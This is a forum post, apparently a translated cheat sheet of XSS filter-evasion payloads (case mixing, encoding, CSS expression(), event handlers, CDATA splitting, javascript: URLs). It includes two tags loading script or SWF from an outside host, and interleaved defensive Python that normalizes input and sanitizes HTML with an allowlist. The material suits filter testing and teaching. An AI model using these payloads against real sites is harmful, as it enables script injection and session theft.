中国网络渗透测试联盟
Title: An introduction to Cross Site Scripting (XSS) attack techniques
Author: admin
Time: 2012-12-31 09:59
1. Mixing character case

<sCript>alert('d')</scRipT>
2. Adding extra characters to evade regular-expression checks

<<script>alert('c')//<</script>

<SCRIPT a=">" SRC="t.js"></SCRIPT>

<SCRIPT =">" SRC="t.js"></SCRIPT>

<SCRIPT a=">" '' SRC="t.js"></SCRIPT>

<SCRIPT "a='>'" SRC="t.js"></SCRIPT>

<SCRIPT a=`>` SRC="t.js"></SCRIPT>

<SCRIPT a=">'>" SRC="t.js"></SCRIPT>
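The first two sections show why a blocklist cannot be patched into correctness: each fix invites the next variation, and the filter is always one pattern behind the parser. The Python below is an added example, not code from the post; it puts a case-sensitive blocklist, its case-insensitive "fix", and context-aware output encoding side by side. `CASE_MIXED` and `EXTRA_ATTR` are constructed test inputs shaped like the payloads of sections 1 and 2.

```python
import html
import re

# Constructed test inputs, shaped like the payloads in sections 1 and 2.
CASE_MIXED = "<sCript>alert('d')</scRipT>"
EXTRA_ATTR = '<SCRIPT a=">" SRC="t.js"></SCRIPT>'

# Blocklist, first attempt: the obvious lowercase tag.
BLOCKLIST_V1 = re.compile(r"<script>")
# Blocklist, second attempt: "fixed" for section 1 by ignoring case.
BLOCKLIST_V2 = re.compile(r"<script>", re.IGNORECASE)


def blocklist_catches(pattern: re.Pattern, fragment: str) -> bool:
    """True if the blocklist pattern would reject this fragment."""
    return pattern.search(fragment) is not None


def encode_for_html_text(fragment: str) -> str:
    """Context-aware output encoding for an HTML text node or a quoted
    attribute: <, >, &, " and ' become character references, so the
    browser never sees a tag boundary inside untrusted data."""
    return html.escape(fragment, quote=True)


def opens_a_tag(rendered: str) -> bool:
    """Does the rendered string still contain something the HTML parser
    would treat as a tag open ('<' followed by a letter or '/')?"""
    return re.search(r"<[a-zA-Z/]", rendered) is not None


if __name__ == "__main__":
    for name, payload in (("case-mixed", CASE_MIXED), ("extra-attr", EXTRA_ATTR)):
        print(name,
              "| v1 catches:", blocklist_catches(BLOCKLIST_V1, payload),
              "| v2 catches:", blocklist_catches(BLOCKLIST_V2, payload),
              "| encoded output opens a tag:",
              opens_a_tag(encode_for_html_text(payload)))
```

The case-insensitive blocklist catches the first payload and misses the second; the encoded output of either payload never contains a tag open, because the defence works on the output context rather than on guessing the attacker's spelling.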
3. Replacing the .js extension with another extension

<script src="bad.jpg"></script>
4. Putting JavaScript in a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

Example:

body {
background-image: url('javascript:alert("XSS");')
}
5. Inserting other characters into the script tag

<SCRIPT/SRC="t.js"></SCRIPT>

<SCRIPT/anyword SRC="t.js"></SCRIPT>
6. Using tabs or newlines to evade

(In this copy the tab and newline characters inside "javascript" have been flattened to spaces.)

<img src="jav ascr ipt:alert('XSS3')">

<img src="jav ascr ipt:alert('XSS3')">

<IMG SRC="jav ascript:alert('XSS');">

-> tab

-> new line
7. Using "\" to evade

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
8. Using hex encoding to evade (the ";" may also be dropped)

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

Source code: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

Source code: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
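Sections 6 to 8 all exploit the same gap: the filter inspects the raw attribute value while the browser inspects a normalized one (tab, CR and LF removed from URLs; character references decoded; CSS backslash escapes and comments resolved). A detection or sanitization step therefore has to normalize the same way before it matches anything. The Python below is an added example, not code from the post; `SAFE_SCHEMES` is an assumed allowlist and the inputs in the usage are constructed.

```python
import html
import re

# Browsers drop ASCII tab, LF and CR anywhere in a URL before parsing it, so
# "jav<TAB>ascr<LF>ipt:" is the javascript: scheme to the browser (section 6).
URL_IGNORED_WHITESPACE = re.compile(r"[\t\n\r]")
# Assumption: the schemes a sanitizer is willing to let through in src/href.
SAFE_SCHEMES = {"http", "https", "mailto"}


def normalize_url(raw: str) -> str:
    """Decode HTML character references (decimal and hex, section 8), then
    remove the whitespace the browser ignores and any surrounding space."""
    decoded = html.unescape(raw)
    return URL_IGNORED_WHITESPACE.sub("", decoded).strip()


def url_scheme(url: str):
    """Scheme of an absolute URL in lower case, or None for a relative URL."""
    m = re.match(r"([a-zA-Z][a-zA-Z0-9+.-]*):", url)
    return m.group(1).lower() if m else None


def url_is_allowed(raw: str) -> bool:
    """Allow relative URLs and allowlisted schemes; reject everything else."""
    scheme = url_scheme(normalize_url(raw))
    return scheme is None or scheme in SAFE_SCHEMES


# In CSS a backslash escapes the next character ("expre\ssi\on" is read as
# "expression"), hex escapes stand for code points, and /* */ comments vanish
# before the value is interpreted (section 7). Normalize the same way.
CSS_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
CSS_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})\s?|\\(.)", re.DOTALL)


def normalize_css(raw: str) -> str:
    def unescape(m: re.Match) -> str:
        if m.group(1) is not None:
            code = int(m.group(1), 16)
            return chr(code) if code <= 0x10FFFF else "\ufffd"
        return m.group(2)
    return CSS_ESCAPE.sub(unescape, CSS_COMMENT.sub("", raw)).lower()


def css_value_is_suspicious(raw: str) -> bool:
    """After normalization, does the value carry expression() or a
    javascript: URL? Only relevant if user-supplied CSS is accepted at all;
    the stronger fix is an allowlist of properties and values."""
    norm = normalize_css(raw)
    return "expression(" in norm or "javascript:" in norm


if __name__ == "__main__":
    # Constructed inputs in the shapes of sections 6, 7 and 8.
    for raw in ("jav\tascr\nipt:alert('XSS3')", "&#106;avascript:alert('abc')",
                "https://example.com/a.js", "/relative/path"):
        print(repr(raw), "->", repr(normalize_url(raw)), "allowed:", url_is_allowed(raw))
    for raw in ("width: expre\\ssi\\on(alert('XSS31'));",
                "xss:expr/*anyword*/ession(alert('sss'))"):
        print(repr(raw), "->", repr(normalize_css(raw)), "suspicious:",
              css_value_is_suspicious(raw))
```

The point of `url_is_allowed` is that it never looks for the string "javascript" at all: after normalization it reads the scheme the browser will read and compares it with a short allowlist, so every spelling in sections 6 and 8 fails the same single check.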
9. Script in an HTML tag

<body onload="alert('onload')">

Event-handler attributes that can carry script:

onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
10. XSS code inside an SWF

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
11. Using CDATA to split the XSS code and reassemble it

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
12. Using HTML+TIME

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>
13. Writing a cookie through META

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
14. JavaScript in src, href, url

<IFRAME SRC=javascript:alert('13')></IFRAME>

<img src="javascript:alert('XSS3')">

<IMG DYNSRC="javascript:alert('XSS20')">

<IMG LOWSRC="javascript:alert('XSS21')">

<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

<IFRAME SRC=javascript:alert('XSS27')></IFRAME>

<TABLE BACKGROUND="javascript:alert('XSS29')">

<DIV STYLE="background-image: url(javascript:alert('XSS30'))">

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}</STYLE><A CLASS=XSS></A>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
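Sections 9 to 14 are all variants of script arriving through an attribute or element the application never needed to accept: event handlers, `<script>`/`<style>`/`<link>`/`<meta>`/`<embed>`/`<xml>`/`<iframe>` elements, and URL-valued attributes that carry a `javascript:` scheme. The robust defence is an allowlist sanitizer: keep only known tags and attributes, never keep `on*` handlers, and admit URL attributes only after normalization. The Python below is an added example written for this page, not code from the post; it uses the standard-library `html.parser`, and the `ALLOWED` table is an assumption chosen for illustration (a real application lists exactly what it needs). The two-line URL check in `url_allowed` is a compact form of the normalize-then-allowlist idea (strip tab/CR/LF, decode character references, accept only http(s), site-relative paths and fragments).

```python
import html
import re
from html.parser import HTMLParser

# Assumption for illustration: the only tags and attributes the application
# needs to accept from users. Everything not listed here is dropped.
ALLOWED = {
    "a": {"href", "title"},
    "img": {"src", "alt"},
    "p": set(), "br": set(), "b": set(), "i": set(), "em": set(),
    "strong": set(), "ul": set(), "ol": set(), "li": set(), "span": set(),
}
URL_ATTRS = {"href", "src"}
VOID = {"img", "br"}
# Elements whose children are not rendered as text; drop their content too.
DROP_CONTENT = {"script", "style", "xml"}


def url_allowed(value: str) -> bool:
    """Decode character references and strip tab/CR/LF (the browser does both
    before resolving), then accept only http(s), site-relative paths or
    fragments. A javascript: URL, however it is spelled, never matches."""
    v = re.sub(r"[\t\r\n]", "", html.unescape(value)).strip()
    return re.match(r"(https?://|/(?!/)|#)", v, re.IGNORECASE) is not None


class Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropping = 0  # > 0 while inside an element from DROP_CONTENT

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.dropping += 1
            return
        if self.dropping or tag not in ALLOWED:
            return  # unknown tag: drop the tag itself, keep its text children
        kept = []
        for name, value in attrs:
            value = value or ""
            # on* handlers (section 9) are never on the allowlist; the explicit
            # check documents the intent.
            if name.startswith("on") or name not in ALLOWED[tag]:
                continue
            if name in URL_ATTRS and not url_allowed(value):
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self.dropping = max(0, self.dropping - 1)
        elif not self.dropping and tag in ALLOWED and tag not in VOID:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.dropping:
            self.out.append(html.escape(data, quote=False))
    # Comments, <?...> processing instructions and <![CDATA[ ... ]]> sections
    # (sections 11 and 12) fall through to HTMLParser's no-op handlers.


def sanitize(fragment: str) -> str:
    """Re-serialize untrusted HTML keeping only allowlisted structure."""
    parser = Sanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    # Constructed inputs in the shapes of sections 9, 12 and 14.
    for sample in ('<body onload="alert(\'onload\')">hi',
                   '<IMG DYNSRC="javascript:alert(\'XSS20\')" src="https://example.com/a.png" alt="x">',
                   '<a href="jav\tascr\nipt:alert(1)" onclick="x()">x</a>',
                   "<IFRAME SRC=javascript:alert(1)></IFRAME><b>ok</b>"):
        print(repr(sample), "->", repr(sanitize(sample)))
```

Because the sanitizer rebuilds the markup from parsed structure, the spelling tricks of the earlier sections do not reach it: the parser lowercases tag and attribute names, resolves character references, and treats `<script>` content as raw text, so the only decisions left are membership checks against `ALLOWED` and the scheme check on URL attributes.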
Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2